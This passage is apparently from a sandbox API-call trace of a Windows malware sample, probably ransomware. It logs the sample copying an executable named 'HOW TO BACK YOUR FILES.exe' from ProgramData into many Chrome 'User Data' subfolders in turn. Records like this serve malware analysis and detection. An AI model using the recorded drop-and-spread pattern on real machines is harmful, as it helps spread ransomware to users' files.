dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.168] GetLastError () returned 0x0 [0111.169] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.169] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dddd500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dddd500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.169] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0111.169] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter" [0111.169] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.169] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\swreporter\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.170] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.170] GetLastError () returned 0x0 [0111.170] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.170] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.171] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0111.171] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant" [0111.171] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.171] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\sslerrorassistant\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.172] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.172] GetLastError () returned 0x0 [0111.172] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.172] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\SSLErrorAssistant\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.172] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" [0111.173] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl" [0111.173] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.173] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\pnacl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.173] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.174] GetLastError () returned 0x0 [0111.174] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.174] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\pnacl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e47510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.175] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" [0111.175] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash" [0111.175] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.175] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\pepperflash\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.177] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.178] GetLastError () returned 0x0 [0111.179] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.179] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\PepperFlash\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.179] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" [0111.179] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials" [0111.179] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.179] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\origintrials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.180] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.180] GetLastError () returned 0x0 [0111.180] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.180] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\OriginTrials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de03660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de03660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.181] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0111.181] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies" [0111.181] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.181] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\filetypepolicies\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.182] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.182] GetLastError () returned 0x0 [0111.182] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.182] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\FileTypePolicies\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de297c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de297c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.182] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0111.183] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist" [0111.183] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.183] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\evwhitelist\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.183] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.184] GetLastError () returned 0x0 [0111.184] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.184] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\EVWhitelist\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de297c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de297c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.184] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0111.184] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0111.184] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.185] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.185] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.185] GetLastError () returned 0x0 [0111.186] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.186] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d125b80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d125b80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.186] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications" [0111.186] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications" [0111.186] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.186] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.187] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.187] GetLastError () returned 0x0 [0111.188] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.188] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de75a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de75a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.188] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" [0111.188] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake" [0111.188] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.188] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.189] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.189] GetLastError () returned 0x0 [0111.189] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.189] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x868593b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d14bce0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d14bce0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.190] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") 